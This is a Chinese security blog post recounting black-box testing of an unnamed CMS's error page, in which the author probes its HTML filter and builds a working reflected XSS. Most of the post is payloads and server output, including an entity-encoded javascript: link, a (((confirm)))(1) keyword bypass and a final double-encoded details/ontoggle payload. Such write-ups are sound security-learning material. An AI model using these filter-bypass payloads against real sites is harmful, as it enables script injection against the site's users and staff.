黑盒的魅力 - 记录一次XSS攻击

  • A+
所属分类:安全文章

0x01 胡乱一点

测试项目业务,无意一顿乱点触发了这么一个接口:

/client/common/error?errcode=500&errmsg=

是个第三方cms,大家可能能看出来是啥cms 当我输入

/client/common/error?errcode=500&errmsg=testest

黑盒的魅力 - 记录一次XSS攻击发现页面输出了我们的testtest:

输出源码:黑盒的魅力 - 记录一次XSS攻击

<div class="scan-login-tips">testtest</div>

0x02 尝试输入Payload:

asdasdasd"</>asdasdasd'/asdasdasd'

输出源码:黑盒的魅力 - 记录一次XSS攻击

<div class="scan-login-tips">asdasdasd"asdasdasd'/asdasdasd'</div>

发现过滤了<>,按理说我应该放弃的,但是我当手贱输入了:

"><img src=1>

黑盒的魅力 - 记录一次XSS攻击发现执行了图片,那就说明图片解析了,那我们输入

<img src=1 onerror=alert(1)>

不就可以xss了?

0x03 我们来试试?

黑盒的魅力 - 记录一次XSS攻击把我们过滤掉了,我们混淆下, 输入:

<img src=1 xxx>

黑盒的魅力 - 记录一次XSS攻击我们再次混淆下:

<xxx img/src/xxx>

黑盒的魅力 - 记录一次XSS攻击已经彻底没有img src的身影了, 说明他这里的过滤器规则就是只允许<img data-original="图片地址" src="http://cn-sec.com/wp-content/themes/begin-lts-1/img/blank.gif" alt="黑盒的魅力 - 记录一次XSS攻击">去加载一张图片

可以输入:

<img src=javascript:alert(1)>

来尝试能否xss,但是我并没有这样做,因为这样的弹窗只能在IE浏览器6.0下,几乎没有任何利用价值,还没有我外部加载一张色情图片价值大.

前情回顾:直接输入<>会被过滤的一干二净,而输入<img src=1>会有记录:

我们输入图片没被过滤,是因为我们的标签是合法的,对程序来说,是无害的,命中了,那么顺藤摸瓜,跑一下html标签吧!

黑盒的魅力 - 记录一次XSS攻击发现可用的标签只有:

18    <a href="123">123</a>    200    false    false    1193  
5    <link>                    200    false    false    1188  
24    <img src=1>    200    false    false    1187    
25    <img/src=1>    200    false    false    1187    
12    <em>123</em>    200    false    false    1184    
11    <i>123</i>    200    false    false    1182    
17    <a>123</a>    200    false    false    1182    

其中<img src=1>已经测试过了,只能让我传送图片,后续又对其他的标签测试,都不能空格分割输入我们的事件,那么我们最后的希望<a>标签

尝试输入:

<a href="javascript:alert(1)">1111</a>

发现被转换了:

<div class="scan-login-tips">a<a href=""javascript:alert(1)"">1111</a></div>

黑盒的魅力 - 记录一次XSS攻击对我们的输入做了处理,我们稍微变形下,看看这是全局的中文编码处理,还是关键字处理:

输入:

<a href="jav1scrip1:123">1111</a>
黑盒的魅力 - 记录一次XSS攻击

发现即使是混淆了javascript,会强制转换成#,去掉冒号其后面的数据再次输入:

a<a%20href="jav1scrip1">1111</a>
黑盒的魅力 - 记录一次XSS攻击

通过源码观察发现,如果我不输冒号(:),他就不会对我们的输入进行强转和安全编码,那么我们可以对冒号(:)进行编码:

输入:

<a href="javascript&colon;alert(1)">1111</a>
黑盒的魅力 - 记录一次XSS攻击

提示了系统错误,为什么是系统错误呢?

因为我们的本意是输入&colon;,他是一个实体字符,但是浏览器上直接输入&,会认为colon;***这一串,是我们的参数,这时候应该怎么做?

&特殊字符url编码成%26:

我们再次输入payload:

<a href="javascript%26colon;alert(1)">1111</a>
黑盒的魅力 - 记录一次XSS攻击

发现我们的前缀都落地了,唯独alert触发关键字被编码了,我们输入个无害的关键字试试:

<a href="javascript%26colon;aaaa">1111</a>
黑盒的魅力 - 记录一次XSS攻击

发现没被特殊编码处理,好了,我们尝试换个关键字,我们遵循一个原则,能用简单的方法绕过,就不要尝试高深复杂的,依次递增绕过难度:

尝试输入:

a<a%20href="javascript%26colon;(((confirm)))(1)">1111</a>

可以绕过的方法太多了,提供一种:

黑盒的魅力 - 记录一次XSS攻击

点击页面的111,从而触发xss:

黑盒的魅力 - 记录一次XSS攻击好了,我们实现了第一步xss弹窗,但是很鸡肋有没有? 需要我们被动点击,这个漏洞对我们来说价值变低了,如果拿去钓鱼,还得诱骗客服点击两次,要求点击一次的xss反射xss可以吗??

但是信任标签就这几个了,这条路断掉了。

0x04 新的征程

我能不能通过实体编码,达成输出我们的恶意payload,我们来试试,黑盒多次发现:

我们换个payload:

asdas<dasd</>asdasdasd%27/asdas%27"%26quot;%26lt;img src=1%26gt;

不要再问&为什么要编码处理,前面有讲! 查看输出:黑盒的魅力 - 记录一次XSS攻击

具体源码:

<div class="scan-login-tips">asdasasdasdasd'/asdas'""<img src="1"></div>

我开始继续改造一步到位: 用一个前几年的万金油payload,工作电脑没什么xss payload

尝试输入:

asdas<dasd</>asdasdasd%27/asdas%27"%26quot;%26lt;details/open/ontoggle=alert(1)%26gt;
黑盒的魅力 - 记录一次XSS攻击

对应输出:

<div class="scan-login-tips">asdasasdasdasd'/asdas'""<details open="" ontoggle="alert(1)"></details></div>

alert(1)进行处理了使用前面的bypass payload:(((confirm)))(1)

最后一次改造我们的输入:

asdas<dasd</>asdasdasd%27/asdas%27"%26quot;%26lt;details/open/ontoggle=(((confirm)))(1)%26gt;

浏览器输入运行:黑盒的魅力 - 记录一次XSS攻击直接命中了

0x05 结尾

黑盒的魅力 - 记录一次XSS攻击墨滴平台编辑的时候,发现我们的代码居然成功的Self-XSS,具体是什么代码?师傅们自行探索吧!

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细 | 钟馗之眼】ZoomEye-python命令行的使用

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

  记一次HW实战笔记 | 艰难的提权爬坑

走过路过的大佬们留个关注再走呗黑盒的魅力 - 记录一次XSS攻击

往期文章有彩蛋哦黑盒的魅力 - 记录一次XSS攻击

黑盒的魅力 - 记录一次XSS攻击

一如既往的学习,一如既往的整理,一如即往的分享。黑盒的魅力 - 记录一次XSS攻击

如侵权请私聊公众号删文


本文始发于微信公众号(渗透Xiao白帽):黑盒的魅力 - 记录一次XSS攻击

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: